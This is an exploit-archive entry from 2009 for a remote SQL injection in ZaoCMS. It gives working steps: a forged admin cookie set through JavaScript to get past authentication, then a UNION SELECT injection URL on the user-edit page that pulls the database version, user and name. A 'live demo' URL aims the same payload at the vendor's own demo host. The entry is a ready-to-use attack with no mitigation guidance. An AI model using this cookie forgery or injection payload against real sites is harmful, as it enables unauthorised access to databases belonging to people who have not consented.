ZaoCMS (user_id) Remote SQL Injection Vulnerability

2009-05-22T00:00:00
ID 1337DAY-ID-5232
Type zdt
Reporter Qabandi
Modified 2009-05-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================
ZaoCMS (user_id) Remote SQL Injection Vulnerability
===================================================


=Vuln:		ZaoCMS - SQL Injection Vulnerability
=INFO:		http://zaocms.com/
=BUY:  		http://zaocms.com/
=DORK:		--


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[email protected]@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
First we need to use the "Insecure cookiue handling" vulnerability, found at http://milw0rm.com/exploits/8763

You add the cookie, javascript:document.cookie="admin=stgAdmin;path=/";

then go to:
http://localhost/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--



LIVE DEMO:
http://demo.zaocms.com/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2018-04-10]  #